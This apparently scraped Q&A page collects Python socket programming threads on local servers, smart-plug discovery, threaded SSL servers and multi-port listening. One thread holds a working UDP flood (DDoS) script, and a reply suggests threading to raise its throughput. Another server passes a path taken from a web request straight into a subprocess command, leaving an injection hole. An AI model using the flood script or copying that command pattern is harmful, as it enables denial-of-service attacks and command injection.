python socketserver opening files from webpage - python

I am trying to make a small server that runs on local machines that will get a request from a webpage and open up a file in openoffice. This approach so far works. However, there are times when requests will not come through right away. When this happens I will wait for at least 5 seconds and then try to hit it a couple more times and then all of the requests come in at the same time. I would really like this to be reliable. Is there something I am missing that will stop this from happening? Any help would be greatly appreciated. Also I am aware that the way I am doing things may not be the safest. I am trying to make it functional and then will work on making it more secure.
import SocketServer
import subprocess
import time
class MyTCPHandler(SocketServer.StreamRequestHandler):
def handle(self):
# self.request is the TCP socket connected to the client
self.data = self.rfile.readline().strip()
print self.data
try:
if self.data != '':
st = self.data.split('\n', 1)[0]
#print st
st = st.split(' ')[1]
print st
if ".odt" in st:
p = subprocess.Popen('C:\openoffice\program\swriter.exe "'+st[1:]+'"')
time.sleep(1)
p.terminate()
except Exception as err:
print err
# just send back the same data, but upper-cased
self.wfile.write(self.data.upper())
PORT = 8081
httpd = SocketServer.TCPServer(("", PORT), MyTCPHandler)
print "serving at port", PORT
httpd.serve_forever()

Related

How to incorporate the IP address of a device into a Python script if the address changes

I have a Python script which retrieves the measured data from a smart plug so that I can visualize it on my Rasbperry Pi.
This command gets the data
send_hs_command("192.168.1.26", 9999, b'{"emeter":{"get_realtime":{}}}')
and this is the define
def send_hs_command(address, port, cmd):
data = b""
tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
tcp_sock.connect((address, port))
tcp_sock.send(encrypt(cmd))
data = tcp_sock.recv(2048)
except socket.error:
print(time.asctime( time.localtime(time.time()) ), "Socket closed.", file=sys.stderr)
finally:
tcp_sock.close()
return data
My problem is that if I take the Smart Plug somewhere else, it will have
a new IP-Address, which means I have to keep rewriting it on my Python script. This is not an option for me. What would be the simplest solution? Thanks
I don't have a Pi to run this on.
If the IP address of the target(Smart Plug) is variable, can you not use a pre-determined host-name(located in '/etc/hostname') instead?
the socket library provides a few handy functions;
You can first use
gethostbyaddr to get the host-name if you don't have the host-name information already.
Then from that point onward you can use the known host-name and use
create_connection to establish connections.
However, if you want to use something more dynamic; I'd suggest using the MAC address as the key.
Please be advised that running scapy which perhaps depends on tcpdump on Raspberry Pi might be CPU exhaustive.
Please take a look at the following snippet:
import socket
import time
import sys
from scapy.all import *
def send_hs_command(address, port, cmd):
data = b""
tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
tcp_sock.connect((address, port))
tcp_sock.send(encrypt(cmd))
data = tcp_sock.recv(2048)
except socket.error:
print(time.asctime( time.localtime(time.time()) ), "Socket closed.", file=sys.stderr)
finally:
tcp_sock.close()
print(data)
return data
def get_ip_from_mac():
# Match ARP requests
packet_list = sniff(filter="arp", count=10) # increase number of arp counts
for i in packet_list:
# Show all ARP requests
# print(i[Ether].src, "is broadcasting IP", i[ARP].psrc)
if (i[ARP].hwsrc == '00:0c:29:b6:f4:be'): # target MAC address
return (True, i[ARP].psrc)
return (False, '')
def main():
result = get_ip_from_mac()
if result[0] == True:
print("Succeeded to reach server")
send_hs_command(result[1], 22, b'{"emeter":{"get_realtime":{}}}')
else:
# logic to retry or graciously fail
print("Failed to reach server")
if __name__== "__main__":
main()

Python 2.7 DDos Script is too slow

I am trying to create a DDos Script (for educational use), however currently its too slow and is only using about 0.8Mb of my upload speed (out of about 20Mb).
UPDATE 3
I have removed the server connection code to try get this running fast enough and its finally fast enough to max out my upload speed (about 20Mbit/s). Now im just looking for a way to run the connection code on the side every 300ish times the main code is running.
import time, socket, os, sys, string, urllib2, threading
print_lock = threading.Lock()
def attack():
port = 80
host = 'target ip address'
message="#I am the bestest in the world. "
ip = socket.gethostbyname( host )
ddos = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ddos.connect((host, port))
for i in xrange(10000000):
try:
ddos.sendto( message, (ip, port))
except socket.error, msg:
print("|[Connection Failed] |")
ddos.close()
def main():
print "DOS app started"
for i in range(10000000):
t = threading.Thread(target=attack)
t.daemon = True
t.start()
t.join()
if __name__ == "__main__":
main()
P.S: I'm looking into Cython however not sure of its functions yet.
Use threading because you can create much more throughput. Also, you're checking to see if the host is up really frequently. Instead, you could consider checking if the host is up every x attempts you try to access it.

issues with socket programming - python

I am doing a client-server project for my college project,
we have to allocate the login to the client.
Client system will request its status for every 2 seconds(to check whether the client is locked or unlocked). and server will accept the client request and reply the client status to the system.
But the problem is server thread is not responding to the client request.
CLIENT THREAD:
def checkPort():
while True:
try:
s = socket.socket()
s.connect((host, port))
s.send('pc1') # send PC name to the server
status = s.recv(1024) # receive the status from the server
if status == "unlock":
disableIntrrupts() # enable all the functions of system
else:
enableInterrupts() # enable all the functions of system
time.sleep(5)
s.close()
except Exception:
pass
SERVER THREAD:
def check_port():
while True:
try:
print "hello loop is repeating"
conn, addr = s.accept()
data = conn.recv(1024)
if exit_on_click == 1:
break
if (any(sublist[0] == data for sublist in available_sys)):
print "locked"
conn.send("lock")
elif (any(sublist[0] == data for sublist in occupied_sys)):
conn.send("unlock")
print "unlocked"
else:
print "added to gui for first time"
available_sys.append([data,addr[0],nameText,usnText,branchText])
availSysList.insert('end',data)
except Exception:
pass
But my problem is server thread is not executing more than 2 time,
So its unable to accept client request more than one time.
can't we handle multiple client sockets using single server socket?
How to handle multiple client request from server ?
Thanks for any help !!
Its because your server, will block waiting for a new connection on this line
conn, addr = s.accept()
This is because calls like .accept and .read are blocking calls that hold the process
You need to consider an alternative design, where in you either.
Have one process per connection (this idea is stupid)
One thread per connection (this idea is less stupid than the first but still mostly foolish)
Have a non blocking design that allows multiple clients and read/write without blocking execution.
To achieve the first, look at multiprocessing, the second is threading the third is slightly more complicated to get your head around but will yield the best results, the go to library for event driven code in Python is twisted but there are others like
gevent
tulip
tornado
And so so many more that I haven't listed here.
here's an full example of implementing a threaded server. it's fully functional and comes with the benefit of using SSL as well. further, i use threaded event objects to signal another class object after storing my received data in a database.
please note, _sni and _cams_db are additional modules purely of my own. if you want to see the _sni module (provides SNI support for pyOpenSSL), let me know.
what follows this, is a snippet from camsbot.py, there's a whole lot more that far exceeds the scope of this question. what i've built is a centralized message relay system. it listens to tcp/2345 and accepts SSL connections. each connection passes messages into the system. short lived connections will connect, pass message, and disconnect. long lived connections will pass numerous messages after connecting. messages are stored in a database and a threading.Event() object (attached to the DB class) is set to tell the bot to poll the database for new messages and relay them.
the below example shows
how to set up a threaded tcp server
how to pass information from the listener to the accept handler such as config data and etc
in addition, this example also shows
how to employ an SSL socket
how to do some basic certificate validations
how to cleanly wrap and unwrap SSL from a tcp socket
how to use poll() on the socket instead of select()
db.pending is a threading.Event() object in _cams_db.py
in the main process we start another thread that waits on the pending object with db.pending.wait(). this makes that thread wait until another thread does db.pending.set(). once it is set, our waiting thread immediately wakes up and continues to work. when our waiting thread is done, it calls db.pending.clear() and goes back to the beginning of the loop and starts waiting again with db.pending.wait()
while True:
db.pending.wait()
# after waking up, do code. for example, we wait for incoming messages to
# be stored in the database. the threaded server will call db.pending.set()
# which will wake us up. we'll poll the DB for new messages, relay them, clear
# our event flag and go back to waiting.
# ...
db.pending.clear()
snippet from camsbot.py:
import sys, os, sys, time, datetime, threading, select, logging, logging.handlers
import configparser, traceback, re, socket, hashlib
# local .py
sys.path.append('/var/vse/python')
import _util, _webby, _sni, _cams_db, _cams_threaded_server, _cams_bot
# ...
def start_courier(config):
# default values
host = '::'
port = 2345
configp = config['configp']
host = configp.get('main', 'relay msp hostport')
# require ipv6 addresses be specified in [xx:xx:xx] notation, therefore
# it is safe to look for :nnnn at the end
if ':' in host and not host.endswith(']'):
port = host.split(':')[-1]
try:
port = int(port, 10)
except:
port = 2345
host = host.split(':')[:-1][0]
server = _cams_threaded_server.ThreadedTCPServer((host, port), _cams_threaded_server.ThreadedTCPRequestHandler, config)
t = threading.Thread(target=server.serve_forever, name='courier')
t.start()
_cams_threaded_server.py:
import socket, socketserver, select, datetime, time, threading
import sys, struct
from OpenSSL.SSL import SSLv23_METHOD, SSLv3_METHOD, TLSv1_METHOD, OP_NO_SSLv2
from OpenSSL.SSL import VERIFY_NONE, VERIFY_PEER, VERIFY_FAIL_IF_NO_PEER_CERT, Context, Connection
from OpenSSL.SSL import FILETYPE_PEM
from OpenSSL.SSL import WantWriteError, WantReadError, WantX509LookupError, ZeroReturnError, SysCallError
from OpenSSL.crypto import load_certificate
from OpenSSL import SSL
# see note at beginning of answer
import _sni, _cams_db
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
def __init__(self, server_address, HandlerClass, config):
socketserver.BaseServer.__init__(self, server_address, HandlerClass)
self.address_family = socket.AF_INET6
self.connected = []
self.logger = config['logger']
self.config = config
self.socket = socket.socket(self.address_family, self.socket_type)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sc = Context(TLSv1_METHOD)
sc.set_verify(VERIFY_PEER|VERIFY_FAIL_IF_NO_PEER_CERT, _sni.verify_cb)
sc.set_tlsext_servername_callback(_sni.pick_certificate)
self.sc = sc
self.server_bind()
self.server_activate()
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
config = self.server.config
logger = self.server.logger
connected = self.server.connected
sc = self.server.sc
try:
self.peer_hostname = socket.gethostbyaddr(socket.gethostbyname(self.request.getpeername()[0]))[0]
except:
self.peer_hostname = '!'+self.request.getpeername()[0]
logger.info('peer: {}'.format(self.peer_hostname))
ssl_s = Connection(sc, self.request)
ssl_s.set_accept_state()
try:
ssl_s.do_handshake()
except:
t,v,tb = sys.exc_info()
logger.warn('handshake failed {}'.format(v))
ssl_s.setblocking(True)
self.ssl_s = ssl_s
try:
peercert = ssl_s.get_peer_certificate()
except:
peercert = False
t,v,tb = sys.exc_info()
logger.warn('SSL get peer cert failed: {}'.format(v))
if not peercert:
logger.warn('No peer certificate')
else:
acl = config['configp']['main'].get('client cn acl', '').split(' ')
cert_subject = peercert.get_subject().CN
logger.info('Looking for {} in acl: {}'.format(cert_subject,acl))
if cert_subject in acl:
logger.info('{} is permitted'.format(cert_subject))
else:
logger.warn('''client CN not approved''')
# it's ok to block here, every socket has its own thread
ssl_s.setblocking(True)
self.db = config['db']
msgcount = 0
p = select.poll()
# don't want writable, just readable
p.register(self.request, select.POLLIN|select.POLLPRI|select.POLLERR|select.POLLHUP|select.POLLNVAL)
peername = ssl_s.getpeername()
x = peername[0]
if x.startswith('::ffff:'):
x = x[7:]
peer_ip = x
try:
host = socket.gethostbyaddr(x)[0]
except:
host = peer_ip
logger.info('{}/{}:{} connected'.format(host, peer_ip, peername[1]))
connected.append( [host, peername[1]] )
if peercert:
threading.current_thread().setName('{}/port={}/CN={}'.format(host, peername[1], peercert.get_subject().CN))
else:
threading.current_thread().setName('{}/port={}'.format(host, peername[1]))
sockclosed = False
while not sockclosed:
keepreading = True
#logger.debug('starting 30 second timeout for poll')
pe = p.poll(30.0)
if not pe:
# empty list means poll timeout
# for SSL sockets it means WTF. we get an EAGAIN like return even if the socket is blocking
continue
logger.debug('poll indicates: {}'.format(pe))
#define SSL_NOTHING 1
#define SSL_WRITING 2
#define SSL_READING 3
#define SSL_X509_LOOKUP 4
while keepreading and not sockclosed:
data,sockclosed,keepreading = self._read_ssl_data(2, head=True)
if sockclosed or not keepreading:
time.sleep(5)
continue
plen = struct.unpack('H', data)[0]
data,sockclosed,keepreading = self._read_ssl_data(plen)
if sockclosed or not keepreading:
time.sleep(5)
continue
# send thank you, ignore any errors since we appear to have gotten
# the message
try:
self.ssl_s.sendall(b'ty')
except:
pass
# extract the timestamp
message_ts = data[0:8]
msgtype = chr(data[8])
message = data[9:].decode()
message_ts = struct.unpack('d', message_ts)[0]
message_ts = datetime.datetime.utcfromtimestamp(message_ts).replace(tzinfo=datetime.timezone.utc)
self.db.enqueue(config['group'], peer_ip, msgtype, message, message_ts)
self.db.pending.set()
# we're recommended to use the return socket object for any future operations rather than the original
try:
s = ssl_s.unwrap()
s.close()
except:
pass
connected.remove( [host, peername[1]] )
t_name = threading.current_thread().getName()
logger.debug('disconnect: {}'.format(t_name))
def _read_ssl_data(self, wantsize=16384, head=False):
_w = ['WANT_NOTHING','WANT_READ','WANT_WRITE','WANT_X509_LOOKUP']
logger = self.server.logger
data = b''
sockclosed = False
keepreading = True
while len(data) < wantsize and keepreading and not sockclosed:
rlen = wantsize - len(data)
try:
w,wr = self.ssl_s.want(),self.ssl_s.want_read()
#logger.debug(' want({}) want_read({})'.format(_w[w],wr))
x = self.ssl_s.recv(rlen)
#logger.debug(' recv(): {}'.format(x))
if not ( x or len(x) ):
raise ZeroReturnError
data += x
if not (len(x) == len(data) == wantsize):
logger.info(' read={}, len(data)={}, plen={}'.format(len(x),len(data),wantsize))
except WantReadError:
# poll(), when ready, read more
keepreading = False
logger.info(' got WantReadError')
continue
except WantWriteError:
# poll(), when ready, write more
keepreading = False
logger.info(' got WantWriteError')
continue
except ZeroReturnError:
# socket got closed, a '0' bytes read also means the same thing
keepreading = False
sockclosed = True
logger.info(' ZRE, socket closed normally')
continue
except SysCallError:
keepreading = False
sockclosed = True
t,v,tb = sys.exc_info()
if v.args[0] == -1: # normal EOF
logger.info(' EOF found, keepreading=False')
else:
logger.info('{} terminated session abruptly while reading plen'.format(self.peer_hostname))
logger.info('t: {}'.format(t))
logger.info('v: {}'.format(v))
continue
except:
t,v,tb = sys.exc_info()
logger.warning(' fucked? {}'.format(v))
raise
if not head and not len(data) == wantsize:
logger.warn(' short read {} of {}'.format(len(data), wantsize))
return data,sockclosed,keepreading
let's start with a bare bones threaded tcp server.
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
def __init__(self, server_address, HandlerClass):
socketserver.BaseServer.__init__(self, server_address, HandlerClass)
self.address_family = socket.AF_INET
self.socket = socket.socket(self.address_family, self.socket_type)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server_bind()
self.server_activate()
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
# self.request is your accepted socket, do all your .read() and .wirte() on it
s = self.request
request = s.read(1024)
# decide locked or unlocked. this example arbitrarily writes back 'locked'
s.write('locked')
# we're done, close the socket and exit with a default return of None
s.close()
ok, start your threaded server with this in your main() function:
server = threading.ThreadedTCPServer(('127.0.0.1', 1234), ThreadedTCPRequestHandler)
t = threading.Thread(target=server.serve_forever, name='optional_name')
t.start()
now you can let the threading module handle the semantics of concurrency and not worry about it.
You might want to take a look at 0MQ and concurrent.futures. 0MQ has a Tornado event loop in the library and it reduces the complexity of socket programming. concurrent.futures is a high level interface over threading or multiprocessing.
You can see different concurrent server approaches at
https://bitbucket.org/arco_group/upper/src
These will help you to choose the better way for you.
Cheers

Why does my HTTP response using Python Sockets fail?

Code:
from socket import *
sP = 14000
servSock = socket(AF_INET,SOCK_STREAM)
servSock.bind(('',sP))
servSock.listen(1)
while 1:
connSock, addr = servSock.accept()
connSock.send('HTTP/1.0 200 OK\nContent-Type:text/html\nConnection:close\n<html>...</html>')
connSock.close()
When I go to the browser and type in localhost:14000, I get an error 101- ERR_CONNECTION_RESET The connection was reset? Not sure why! What am I doing wrong
Several bugs, some more severe than others ... as #IanWetherbee already noted, you need an empty line before the body. You also should send \r\n not just \n. You should use sendall to avoid short sends. Last, you need to close the connection once you're done sending.
Here's a slightly modified version of the above:
from socket import *
sP = 14000
servSock = socket(AF_INET,SOCK_STREAM)
servSock.bind(('',sP))
servSock.listen(1)
while 1:
connSock, addr = servSock.accept()
connSock.sendall('HTTP/1.0 200 OK\r\nContent-Type:text/html\r\nConnection:close\r\n\r\n<html><head>foo</head></html>\r\n')
connSock.close()
Running your code, I have similar errors and am unsure on their origins too. However, rather than rolling your own HTTP server, have you considered a built in one? Check out the sample below. This can also support POST as well (have to add the do_POST method).
Simple HTTP Server
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
class customHTTPServer(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write('<HTML><body>Hello World!</body></HTML>')
return
def main():
try:
server = HTTPServer(('',14000),customHTTPServer)
print 'server started at port 14000'
server.serve_forever()
except KeyboardInterrupt:
server.socket.close()
if __name__=='__main__':
main()

How to make server accepting connections from multiple ports?

How can I make a simple server(simple as in accepting a connection and print to terminal whatever is received) accept connection from multiple ports or a port range?
Do I have to use multiple threads, one for each bind call. Or is there another solution?
The simple server can look something like this.
def server():
import sys, os, socket
port = 11116
host = ''
backlog = 5 # Number of clients on wait.
buf_size = 1024
try:
listening_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listening_socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
listening_socket.bind((host, port))
listening_socket.listen(backlog)
except socket.error, (value, message):
if listening_socket:
listening_socket.close()
print 'Could not open socket: ' + message
sys.exit(1)
while True:
accepted_socket, adress = listening_socket.accept()
data = accepted_socket.recv(buf_size)
if data:
accepted_socket.send('Hello, and goodbye.')
accepted_socket.close()
server()
EDIT:
This is an example of how it can be done. Thanks everyone.
import socket, select
def server():
import sys, os, socket
port_wan = 11111
port_mob = 11112
port_sat = 11113
sock_lst = []
host = ''
backlog = 5 # Number of clients on wait.
buf_size = 1024
try:
for item in port_wan, port_mob, port_sat:
sock_lst.append(socket.socket(socket.AF_INET, socket.SOCK_STREAM))
sock_lst[-1].setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
sock_lst[-1].bind((host, item))
sock_lst[-1].listen(backlog)
except socket.error, (value, message):
if sock_lst[-1]:
sock_lst[-1].close()
sock_lst = sock_lst[:-1]
print 'Could not open socket: ' + message
sys.exit(1)
while True:
read, write, error = select.select(sock_lst,[],[])
for r in read:
for item in sock_lst:
if r == item:
accepted_socket, adress = item.accept()
print 'We have a connection with ', adress
data = accepted_socket.recv(buf_size)
if data:
print data
accepted_socket.send('Hello, and goodbye.')
accepted_socket.close()
server()
I'm not a python guy, but the function you are interested in is "select". This will allow you to watch multiple sockets and breaks out when activity occurs on any one of them.
Here's a python example that uses select.
Since Python's got so much overhead, multithreaded apps are a big point of debate. Then there's the whole blocking-operation-GIL issue too. Luckily, the Python motto of "If it seems like a big issue, someone's probably already come up with a solution (or several!)" holds true here. My favorite solution tends to be the microthread model, specifically gevent.
Gevent is an event-driven single-thread concurrency library that handles most issues for you out of the box via monkey-patching. gevent.monkey.patch_socket() is a function that replaces the normal socket calls with non-blocking variants, polling and sleeping to allow the switch to other greenlets as need be. If you want more control, or it's not cutting it for you, you can easily manage the switching with select and gevent's cooperative yield.
Here's a simple example.
import gevent
import socket
import gevent.monkey; gevent.monkey.patch_socket()
ALL_PORTS=[i for i in xrange(1024, 2048)]
MY_ADDRESS = "127.0.0.1"
def init_server_sock(port):
try:
s=socket.socket()
s.setblocking(0)
s.bind((MY_ADDRESS, port))
s.listen(5)
return s
except Exception, e:
print "Exception creating socket at port %i: %s" % (port, str(e))
return False
def interact(port, sock):
while 1:
try:
csock, addr = sock.accept()
except:
continue
data = ""
while not data:
try:
data=csock.recv(1024)
print data
except:
gevent.sleep(0) #this is the cooperative yield
csock.send("Port %i got your message!" % port)
csock.close()
gevent.sleep(0)
def main():
socks = {p:init_server_sock(p) for p in ALL_PORTS}
greenlets = []
for k,v in socks.items():
if not v:
socks.pop(k)
else:
greenlets.append(gevent.spawn(interact, k, v))
#now we've got our sockets, let's start accepting
gevent.joinall(greenlets)
That would be a super-simple, completely untested server serving plain text We got your message! on ports 1024-2048. Involving select is a little harder; you'd have to have a manager greenlet which calls select and then starts up the active ones; but that's not massively hard to implement.
Hope this helps! The nice part of the greenlet-based philosophy is that the select call is actually part of their hub module, as I recall, which will allow you to create a much more scalable and complex server more easily. It's pretty efficient too; there are a couple benchmarks floating around.
If you really wanted to be lazy (from a programmer standpoint, not an evaluation standpoint), you could set a timeout on your blocking read and just loop through all your sockets; if a timeout occurs, there wasn't any data available. Functionally, this is similar to what the select is doing, but it is taking that control away from the OS and putting it in your application.
Of course, this implies that as your sleep time gets smaller, your program will approach 100% CPU usage, so you wouldn't use it on a production app. It's fine for a toy though.
It would go something like this: (not tested)
def server():
import sys, os, socket
port = 11116
host = ''
backlog = 5 # Number of clients on wait.
buf_size = 1024
NUM_SOCKETS = 10
START_PORT = 2000
try:
socket.setdefaulttimeout(0.5) # raise a socket.timeout error after a half second
listening_sockets = []
for i in range(NUM_SOCKETS):
listening_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listening_socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
listening_socket.bind((host, START_PORT + i))
listening_socket.listen(backlog)
listening_sockets.append(listening_socket)
except socket.error, (value, message):
if listening_socket:
listening_socket.close()
print 'Could not open socket: ' + message
sys.exit(1)
while True:
for sock in listening_sockets:
try:
accepted_socket, adress = sock_socket.accept()
data = sock.recv(buf_size)
if data:
sock_socket.send('Hello, and goodbye.')
sock.close()
except socket.timeout:
pass
server()

Categories